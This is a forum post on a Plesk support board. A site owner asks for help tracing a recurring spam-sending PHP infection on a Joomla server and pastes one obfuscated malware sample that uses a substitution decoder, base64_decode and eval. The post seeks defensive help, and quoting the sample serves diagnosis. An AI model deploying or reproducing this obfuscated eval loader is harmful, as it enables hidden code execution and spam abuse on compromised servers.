• Plesk Uservoice will be deprecated by October. Moving forward, all product feature requests and improvement suggestions will be managed through our new platform Plesk Productboard.
    To continue sharing your ideas and feedback, please visit features.plesk.com

[Spam php script] Finding the root cause

minhnv

New Pleskian
Hi all,

My server sending a lot of spam emails via some php script like below and in the attachment.
I can found the file and delete it. After few hours, some other script appear (even after i changed all the password, not sure if spammer upload all the script before or not) and sending spam again.

Some info:
+Joomla 3.3.6 website
+Plesk 11.5
+CentOS 6.5

Action i did:
+ Delete php scipts
+ Change all password related to this subscription: Users,fpt,...
+ Turn off mail service, turn off mail feature in joomla.

What i looking for:
+ Root cause? Please instruct me to find this ( access log ? ip ? ) or somethings else ?
+ How to prevent such problem ?

<?php
function dbwcmxhx($ijljihs, $axdxkatqwt){$jvmpgqagt = ''; for($i=0; $i < strlen($ijljihs); $i++){$jvmpgqagt .= isset($axdxkatqwt[$ijljihs[$i]]) ? $axdxkatqwt[$ijljihs[$i]] : $ijljihs[$i];}
$uh="base64_decode";return $uh($jvmpgqagt);}
$qfzaigliex = 'zh1qC29g7czMGX2SJ89ScXaU7SJNHY02fYA3FA3eCP03cui1Bmwp6h9pcX2SJ89SJS'.
'JNHle3FA3eCP03cui1Bmwp6PEscX2s7PiWBh1U619yCPW1GSAwkmVOmVng7cjtBh1o729NCPW3BmwATfNTm818Th1gJX2yTmj'.
$djvgzn = Array('1'=>'l', '0'=>'5', '3'=>'p', '2'=>'V', '5'=>'Y', '4'=>'8', '7'=>'Z', '6'=>'b', '9'=>'9', '8'=>'m', 'A'=>'w', 'C'=>'a', 'B'=>'d', 'E'=>'F', 'D'=>'i', 'G'=>'J', 'F'=>'O', 'I'=>'h', 'H'=>'I', 'K'=>'L', 'J'=>'c', 'M'=>'o', 'L'=>'U', 'O'=>'7', 'N'=>'s', 'Q'=>'j', 'P'=>'W', 'S'=>'y', 'R'=>'P', 'U'=>'v', 'T'=>'K', 'W'=>'1', 'V'=>'k', 'Y'=>'E', 'X'=>'2', 'Z'=>'r', 'a'=>'x', 'c'=>'X', 'b'=>'6', 'e'=>'A', 'd'=>'S', 'g'=>'z', 'f'=>'T', 'i'=>'N', 'h'=>'G', 'k'=>'M', 'j'=>'R', 'm'=>'C', 'l'=>'D', 'o'=>'t', 'n'=>'B', 'q'=>'u', 'p'=>'n', 's'=>'4', 'r'=>'q', 'u'=>'3', 't'=>'f', 'w'=>'g', 'v'=>'e', 'y'=>'0', 'x'=>'H', 'z'=>'Q');
eval(dbwcmxhx($qfzaigliex, $djvgzn));?>
 

Attachments

  • press - Copy (1).txt
    151.5 KB · Views: 0
  • object - Copy.txt
    151.6 KB · Views: 0
Back
Top